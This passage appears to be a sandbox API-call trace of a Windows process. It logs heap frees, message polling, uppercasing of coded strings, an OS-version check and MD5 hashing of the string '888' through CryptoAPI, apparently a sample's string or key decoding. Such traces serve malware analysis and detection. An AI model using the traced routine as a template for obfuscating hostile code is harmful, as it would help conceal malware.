lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.634] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0113.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0113.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0113.634] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0113.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0113.635] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0113.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0113.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0113.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0113.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0113.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0113.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0113.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0113.635] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0113.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0113.635] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0113.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0113.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0113.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0113.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0113.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0113.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0113.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0113.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0113.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0113.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0113.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0113.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0113.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0113.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0113.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0113.635] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0113.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0113.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0113.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0113.636] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0113.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0113.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0113.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0113.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0113.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0113.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0113.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0113.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0113.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0113.636] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0113.636] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.636] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0113.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0113.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0113.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0113.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0113.636] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0113.636] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0113.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0113.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0113.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0113.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0113.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0113.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0113.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0113.637] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0113.637] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0113.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0113.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0113.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0113.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0113.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0113.637] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0113.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0113.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0113.637] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.637] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.637] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.637] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0113.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0113.637] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.637] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.637] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0113.637] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.638] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0113.638] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0113.638] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0113.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7140, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0113.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0113.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f71e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0113.638] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9be9a0) returned 1 [0113.639] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.639] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.639] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0113.639] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.639] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0113.639] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.639] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.639] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.639] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.639] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.639] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.639] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0113.639] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.639] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0113.639] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.639] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.639] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0113.639] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0113.639] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.640] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.640] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0113.640] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0113.640] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.640] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0113.640] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.640] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.640] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.640] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.640] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.640] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.640] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.640] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0113.640] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.640] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0113.640] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.640] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.640] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0113.640] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0113.640] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0113.640] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0113.640] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0113.640] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.641] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.641] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0113.641] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0113.641] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0113.641] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0113.641] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0113.641] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0113.641] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.641] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.641] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.641] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.641] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.641] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.641] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.690] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.690] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0113.690] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.690] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0113.690] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.691] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.691] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0113.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa528, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0113.691] CryptCreateHash (in: hProv=0x9be9a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0113.691] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.691] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.691] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.691] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0113.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0113.691] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0113.691] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0113.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0113.692] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.692] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.692] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, 